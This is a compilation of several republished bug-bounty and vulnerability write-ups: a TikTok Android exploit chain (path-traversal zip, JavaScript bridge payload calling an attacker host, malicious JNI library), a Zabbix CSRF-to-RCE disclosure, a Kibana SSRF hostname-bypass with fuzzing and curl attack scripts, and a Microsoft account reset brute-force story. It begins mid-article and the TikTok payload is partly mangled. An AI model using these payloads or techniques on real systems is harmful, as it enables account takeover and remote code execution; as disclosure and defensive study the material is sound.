I created a zip file and path traversed the filename to overwrite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/ file:

dphoeniixx@MacBook-Pro Tiktok % 7z l

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)

Scanning the drive for archives:
1 file, 1930 bytes (2 KiB)

Listing archive:

Path =
Type = zip
Physical Size = 1930

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 ..... 5896 1496 ../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 5896 1496 1 files

Now we can overwrite native-libraries with a malicious library to execute our code. It won’t be executed unless the user relaunches the Application. I found a way to reload that library without relaunch by launching Activity.

Final PoC:

document.title = "Loading..";
if (document && != "finished") { // the XSS will be fired multiple time before loading the page and after. this condition to make sure that the payload won't fire multiple time. = "finished";
"__callback_id": "0",
"func": "preloadMiniApp",
"__msg_type": "callback",
"params": {
"mini_app_url": "https://microapp/"
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://d.c/"
})); // initialize Mini App
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript:location.replace({ATTACKER_HOST}"
"JSSDK": "1",
"namespace": "host",
"__iframe_url": ""
})); // Download malicious zip file that will overwite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/
setTimeout(function() {
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript:location.replace("
"JSSDK": "1",
"namespace": "host",
"__iframe_url": ""
})); // load the malicious library after overwrtting it.
}, 5000);

Malicious library code:

#include <jni.h>
#include <string>
#include <stdlib.h>

JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
system("id > /data/data/com.zhiliaoapp.musically/PoC");
return JNI_VERSION_1_6;

TikTok Fixing!

TikTok Security implemented an excellent and responsible fix to address those vulnerabilities in a timely manner. The following actions were taken:

  1. The vulnerable XSS code has been deleted.
  2. TmaTestActivity has been deleted.
  3. Implement restrictions to intent scheme that doesn’t allow an intent for TikTok Application on AddWikiActivity and Main WebViewActivity.

Have a nice day!

CVE-2021-27927: CSRF to RCE Chain in Zabbix

RCE Chain in Zabbix

Original text horizon3ai


Zabbix is an enterprise IT network and application monitoring solution. In a routine review of its source code, we discovered a CSRF (cross-site request forgery) vulnerability in the authentication component of the Zabbix UI. Using this vulnerability, an unauthenticated attacker can take over the Zabbix administrator’s account if the attacker can persuade the Zabbix administrator to follow a malicious link. This vulnerability is exploitable in all browsers even with the default SameSite=Lax cookie protection in place. The vulnerability is fixed in Zabbix versions 4.0.28rc1, 5.0.8rc1, 5.2.4rc1, and 5.4.0alpha1.


The impact of this vulnerability is high. While user interaction is required to exploit the vulnerability, the consequence of a successful exploit is full takeover of the Zabbix administrator account. Administrative access to Zabbix provides attackers a wealth of information about other devices on the network and the ability to execute arbitrary commands on the Zabbix server. In certain configurations, attackers can also execute arbitrary commands on hosts being monitored by Zabbix.

CVSS vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

As of this writing, there are ~20K instances of Zabbix on the Internet that can be found with the Shodan dork «html: Zabbix».


Upgrade to at least Zabbix version 4.0.28rc1, 5.0.8rc1, 5.2.4rc1, or 5.4.0alpha1.


A CSRF exploit works as follows:

  • First, a user (the victim) logs in to a vulnerable web site (the target). «Logged in» in this case simply means the user’s browser has stored within it a valid session cookie or basic authentication credential for the target web site. The browser application doesn’t necessarily need to be open.  
  • Next, an attacker uses social engineering to persuade the victim user to follow a link to a malicious attacker-controlled web site. There are a variety of methods to achieve this such as phishing emails or links in chat, etc.  
  • When the victim visits the malicious web site, HTML/JavaScript code from the malicious site gets loaded into the victim’s browser. This code then sends an API request to the target web site. The request originating from the malicious web site looks legitimate to the victim’s browser, and as a result, the victim’s browser sends the user’s session cookies along with the request.  
  • The malicious request lands at the target web application. The target web application can’t tell that the request is coming from a malicious source. The target web application carries out the requested action on behalf of the attacker. CSRF attacks often try to abuse authentication-related actions such as creating or modifying users or changing passwords.

CSRF Attack Prevention

The most commonly used defense against CSRF attacks is to use anti-CSRF tokens. These tokens are randomly generated pieces of data that are sent as part of requests from an application’s frontend code to the backend. The backend verifies both the anti-CSRF token and the user’s session cookie. The token can be transferred as a HTTP header or in the request body, but not as a cookie. This method, if implemented correctly, defeats CSRF attacks because it becomes very difficult for attackers to craft forged requests that include the correct anti-CSRF token.

Zabbix uses an anti-CSRF token in the form of a sid parameter that’s passed in the request body. For instance the request to update the Zabbix Admin user’s password to the value zabbix1 looks like this:

This request fails if the sid parameter is missing or incorrect.

Another measure that offers some protection against CSRF attacks is the Same-Site cookie attribute. This is a setting that browsers use to determine when it’s ok to transfer cookies as part of cross-site requests to a site. This attribute has three values: StrictLax, and None.

  • Same-Site=Strict: Never send cookies as part of cross-site requests.
  • Same-Site=Lax: Only send cookies as part of cross-site requests if they are GET requests and effect a top-level navigation, i.e. result in a change to the browser’s address bar. Clicking a link is considered a top-level navigation, while loading an image or script is not. GET requests are generally considered safe because they are not supposed to mutate any backend state.
  • Same-Site-None: Send cookies along for all cross-site requests.

Web application developers can choose to set the value of the Same-Site attribute explicitly as part of sending a cookie to the front-end after a user authenticates. If the attribute is not set explicitly, modern browsers will default the value to Lax. This is the case with Zabbix — the Same-Site attribute is not set and it’s defaulted to Lax.

Zabbix CVE-2021-27927

As mentioned above, Zabbix uses anti-CSRF tokens, and these tokens are effective against CSRF attacks that attempt to exploit actions such as adding and modifying users and roles. However there was one important scenario we found in which anti-CSRF tokens were not being validated: an update to the application’s authentication settings.

This form controls the type of authentication that is used to login to Zabbix, which can be one of «Internal» or «LDAP». In the event of LDAP, one can also set the details of the LDAP provider such as the LDAP host and port, base DN, etc.

The backend controller class CControllerAuthenticationUpdate that handles this form submission had token validation turned off, as shown below:

In addition, and just as important, we found that in Zabbix any parameters submitted in a request body via POST could equivalently be submitted as URL query parameters via a GET. This meant that the following forged GET request, which is missing the sid parameter could work just as well as a legitimate POST request that contains the sid.

GET /zabbix.php?form_refresh=1&action=authentication.update&db_authentication_type=0&authentication_type=1&http_auth_enabled=0&ldap_configured=1&ldap_host=!&saml_auth_enabled=0&update=Update

The above request updates the authentication method to LDAP and sets various LDAP attributes.


To carry out a fully attack, an attacker would do the following:

First, set up an attacker-controlled LDAP server that is network accessible to the target Zabbix application. For our example, we used an Active Directory server at We also provisioned a user called «Admin» (which matches the built-in Zabbix admin user name) inside Active Directory with the password «Z@bb1x!».  

Then, host a web site containing a malicious HTML page. For our example, we had an HTML page that contained a link with the forged cross-site request. Upon loading the page, the link would be automatically clicked via JavaScript. This meets the requirement for «top-level navigation.»


  <p>Any web site</p>
  <a id='link' href='!&saml_auth_enabled=0&update=Update'></a>


Finally, entice the victim Zabbix Admin user to click on link to the malicious site. Once this happens, the Zabbix Admin would see that the authentication settings on the site were automatically updated like this:

At this point an attacker can log in with his/her own Admin user credential. Incidentally, the victim Zabbix Admin’s session still remains valid until he/she logs out.

One interesting aspect of this particular CSRF attack is that it’s not blind. This is because Zabbix validates the LDAP server connection using a test user and password as part of processing the authentication settings form submission. An attacker can know immediately if the CSRF attack was successful by virtue of the Zabbix application connecting to his/her own LDAP server. Once the test connection takes place, an attacker could automate logging into the victim’s Zabbix server and carrying out further actions.

Remote Command Execution

Once an attacker has gained admin access, he/she can gain remote command execution privileges easily because it is a built-in feature of the product. The Scripts section of the UI contains a place to drop in any commands to be executed on either the Zabbix server, a Zabbix server proxy, or a Zabbix agent (agents run on hosts being monitored by Zabbix).

For instance, to get a reverse shell on the Zabbix server, an attacker could modify the built-in Detect Operating Systems script to include a perl reverse shell payload like this:

Then execute the script off the dashboard page:

To get reverse shell:

Depending on the configuration, an attacker can also run remote commands at the server proxy or agent. More details here from the Zabbix documentation.


  • Jan. 3, 2021: Vulnerability disclosed to vendor
  • Jan. 13, 2021: Vulnerability fixed in code by vendor
  • Feb. 22, 2021: New releases made available by vendor across all supported versions
  • Mar. 3, 2021: Public disclosure  


SSRF: Bypassing hostname restrictions with fuzzing

SSRF: Bypassing hostname restrictions with fuzzing

Original text by dee__see

When the same data is parsed twice by different parsers, some interesting security bugs can be introduced. In this post I will show how I used fuzzing to find a parser diffential issue in Kibana’s alerting and actions feature and how I leveraged radamsa to fuzz NodeJS’ URL parsers.

Kibana alerting and actions

Kibana has an alerting feature that allows users to trigger an action when certain conditions are met. There’s a variety of actions that can be chosen like sending an email, opening a ticket in Jira or sending a request to a webhook. To make sure this doesn’t become SSRF as a feature, there’s an xpack.actions.allowedHosts setting where users can configure a list of hosts that are allowed as webhook targets.

Parser differential

Parsing URLs consistently is notoriously difficult and sometimes the inconsistencies are there on purpose. Because of this, I was curious to see how the webhook target was validated against the xpack.actions.allowedHosts setting and how the URL was parsed before sending the request to the webhook. Is it the same parser? If not, are there any URLs that can appear fine to the hostname validation but target a completely different URL when sending the HTTP request?

After digging into the webhook code, I coud identify that hostname validation happens in isHostnameAllowedInUri. The important part to notice is that the hostname is extracted from the webhook’s URL by doing new URL(userInputUrl).hostname.

function isHostnameAllowedInUri(config: ActionsConfigType, uri: string): boolean {
  return pipe(
    tryCatch(() => new URL(uri)),
    map((url) => url.hostname),
    mapNullable((hostname) => isAllowed(config, hostname)),
    getOrElse<boolean>(() => false)

On the other hand, the library that sends the HTTP request uses require('url').parse(userInputUrl).hostname to parse the hostname.

var url = require('url');

// ...

// Parse url
var fullPath = buildFullPath(config.baseURL, config.url);
var parsed = url.parse(fullPath);

// ...

options.hostname = parsed.hostname;

After reading some documentation, I could validate that those were effectively two different parsers and not just two ways of doing the same thing. Very interesting! Now I’m looking for a URL that is accepted by isHostnameAllowedInUri but results in an HTTP request to a different host. In other words, I’m looking for X where new URL(X).hostname !== require('url').parse(X).hostname and this is where the fuzzing comes in.

Fuzzing for SSRF

When you’re looking to generate test strings without going all in with coverage guided fuzzing like AFL or libFuzzer, radamsa is the perfect solution.

Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestringly different outputs from them.

The plan was the following:

  1. Feed a normal URL to radamsa as a starting point
  2. Parse radamsa’s output using both parsers
  3. If both parsed hostnames are different and valid, save that URL

Here’s the code used to do the fuzzing and validate the results:

const child_process = require('child_process');
const radamsa = child_process.spawn('./radamsa/bin/radamsa', ['-n', 'inf']);

radamsa.stdout.on('data', function (input) {
    input = 'http://' + input

    // Resulting host names need to be valid for this to be useful
    function isInvalid(host) {
        return host === null || host === '' || !/^[a-zA-Z0-9.-]+$/.test(host1);

    let host1;
    try {
        host1 = new URL(input).hostname;
    } catch (e) {
        return; // Both hosts need to parse

    if (isInvalid(host1)) return;
    if (/^([0-9.]+)$/.test(host1)) return; // host1 should be a domain, not an IP

    let host2;
    try {
        host2 = require('url').parse(input).hostname;
    } catch (e) {
        return; // Both hosts need to parse

    if (isInvalid(host2)) return;
    if (host1 === host2) return;

        `${encodeURIComponent(input)} was parsed as ${host1} with URL constructor and ${host2} with url.parse.`

There are some issues with that code and I think the stdin writer might have trouble handling null bytes, but nevertheless after a little while this popped up (the output was URL-encoded to catch non-printable characters): was parsed as domain.com4294967298 with URL constructor and with url.parse.

With the original string containing the hostname<TAB>4294967298, one parser stripped the tab character and the other truncated the hostname where the tab was inserted. This is very interesting and can definitely be abused: imagine a webhook that requires the target to be, but when you enter<TAB>m the filter thinks it’s valid but the request is actually sent to All the attacker has to do is register that domain and point it to or any other internal target and it makes for a fun SSRF.

The attack

This is exactly what could be achived in Kibana.

  1. Assume the xpack.actions.allowedHosts setting requires webhooks to target
  2. As the attacker, register
  3. Add a DNS record pointing to or any other internal IP
  4. Create a webhook action
  5. Use the API to send a test message to the webhook and specify the url<TAB>m
  6. Observe the response, in this case there were 3 different responses allowing to differentiate a live host, a live host that responds to HTTP requests and a dead host

Here’s the script used to demonstrate the attack.


# The \t is important

# Create Webhook Action
connector_id=$(curl -sk -u "$creds" --url "$kibana_url/api/actions/action" -X POST -H 'Content-Type: application/json' -H 'kbn-xsrf: true' \
    -d '{"actionTypeId":".webhook","config":{"method":"post","hasAuth":false,"url":"'$ssrf_target'","headers":{"content-type":"application/json"}},"secrets":{"user":null,"password":null},"name":"'$(date +%s)'"}' |
    jq -r .id)

# Send request to target using the test function
curl -sk -u "$creds" --url "$kibana_url/api/actions/action/$connector_id/_execute" -X POST -H 'Content-Type: application/json' -H 'kbn-xsrf: true' \
    -d '{"params":{"body":"{\"arbitrary_payload_here\":true}"}}'

# Server should have received the request


Unfortunately, the resulting URL with the bypass is a bit mangled as we can see from this output taken from the NodeJS console:

> require('url').parse("htts://\x09m/path")
Url {
  protocol: 'htts:',
  slashes: true,
  auth: null,
  host: '',
  port: null,
  hostname: '',
  hash: null,
  search: null,
  query: null,
  pathname: '%09m/path',
  path: '%09m/path',
  href: 'htts://' }

The part that is truncated from the hostname is just pushed to the path and make it hard to craft any request that can achieve more than the basic internal network/port scan. However, if the parsers’ roles had been inverted and new URI had been used for the request instead I would have had a clean path and much more potential for exploitation with a fully controlled path and POST body. Certainly this situation comes up somewhere, let me know if you come across something like that and are able to exploit it!


A few things to take away from this:

  • When reviewing code, any time data is parsed for valiation make sure it’s parsed the same way when it’s being used
  • Fuzzing with radamsa is simple and quick to setup, a great addition to any bug hunter’s toolbet
  • If you’re doing blackbox testing and facing hostname validations in a NodeJS envioronment, try to add some tabs and see where that leads

Thanks for reading!

(This was disclosed with permission)

How I Might Have Hacked Any Microsoft Account

How I Might Have Hacked Any Microsoft Account

Original text by LAXMAN MUTHIYAH

This article is about how I found a vulnerability on Microsoft online services that might have allowed anyone to takeover any Microsoft account without consent permission. Microsoft security team patched the issue and rewarded me $50,000 as a part of their Identity Bounty Program.

After my Instagram account takeover vulnerability, I was searching for similar loopholes in other services. I found Microsoft is also using the similar technique to reset user’s password so I decided to test them for any rate limiting vulnerability.

To reset a Microsoft account’s password, we need to enter our email address or phone number in their forgot password page, after that we will be asked to select the email or mobile number that can be used to receive security code.

Once we receive the 7 digit security code, we will have to enter it to reset the password. Here, if we can bruteforce all the combination of 7 digit code (that will be 10^7 = 10 million codes), we will be able to reset any user’s password without permission. But, obviously, there will be some rate limits that will prevent us from making large number of attempts.

Intercepting the HTTP POST request made to code validation endpoint looked like this

If you look at the screenshot above, the code 1234567 we entered was nowhere present in the request. It was encrypted and then sent for validation. I guess they are doing this to prevent automated bruteforce tools from exploiting their system. So, we cannot automate testing multiple codes using tools like Burp Intruder since they won’t do the encryption part 😕

After some time, I figured out the encryption technique and was able to automate the entire process from encrypting the code to sending multiple concurrent requests.

My initial test showed the presence of rate limits as expected. Out of 1000 codes sent, only 122 of them got through, others are limited with 1211 error code and they are blocking the respective user account from sending further attempts if we continuously send requests.

Then, I tried sending simultaneous / concurrent requests like I did for Instagram, that allowed me to send large number of requests without getting blocked but I was still unable to get the successful response while injecting the correct 7 digit security code. I thought they have some controls in place to prevent this type of attack. Although I am getting an error while sending the right code, there was still no evidence of blocking the user like we saw in the initial test. So I was still hoping that there would be something.

Never Give Up Reaction GIF by Best Friends Animal Society

After some days, I realized that they are blacklisting the IP address if all the requests we send don’t hit the server at the same time, even a few milliseconds delay between the requests allowed the server to detect the attack and block it. Then I tweaked my code to handle this scenario and tested it again.

Supernatural Dean Winchester GIF

Surprisingly, it worked and I was able to get the successful response this time 😀

Celebration Dancing GIF by Juli

I sent around 1000 seven digit codes including the right one and was able to get the next step to change the password.

The above process is valid only for those who do not have two factor authentication enabled, if a user has enabled 2FA, we will have to bypass two factor code authentication as well, to change the password.

I tested an account with 2FA and found both are same endpoint that are vulnerable to this type of attack. At first, user will be prompted to enter a 6 digit code generated by authenticator app, only then they will be asked to enter 7 digit code sent to their email or phone number. Then, they can change the password.

Putting all together, an attacker has to send all the possibilities of 6 and 7 digit security codes that would be around 11 million request attempts and it has to be sent concurrently to change the password of any Microsoft account (including those with 2FA enabled).

It is not at all a easy process to send such large number of concurrent requests, that would require a lot of computing resources as well as 1000s of IP address to complete the attack successfully.

Immediately, I recorded a video of all the bypasses and submitted it to Microsoft along with detailed steps to reproduce the vulnerability. They were quick in acknowledging the issue.

The issue was patched in November 2020 and my case was assigned to different security impact than the one expected. I asked them to reconsider the security impact explaining my attack. After a few back and forth emails, my case was assigned to Elevation of Privilege (Involving Multi-factor Authentication Bypass). Due to the complexity of the attack, bug severity was assigned as important instead of critical.

Bount email from MSRC

Microsoft Acknowledgement for Reporting this issue

I received the bounty of $50,000 USD on Feb 9th, 2021 through hackerone and got approval to publish this article on March 1st. I would like to thank Dan, Jarek and the entire MSRC Team for patiently listening to all my comments, providing updates and patching the issue. I also like to thank Microsoft for the bounty 🙏 😊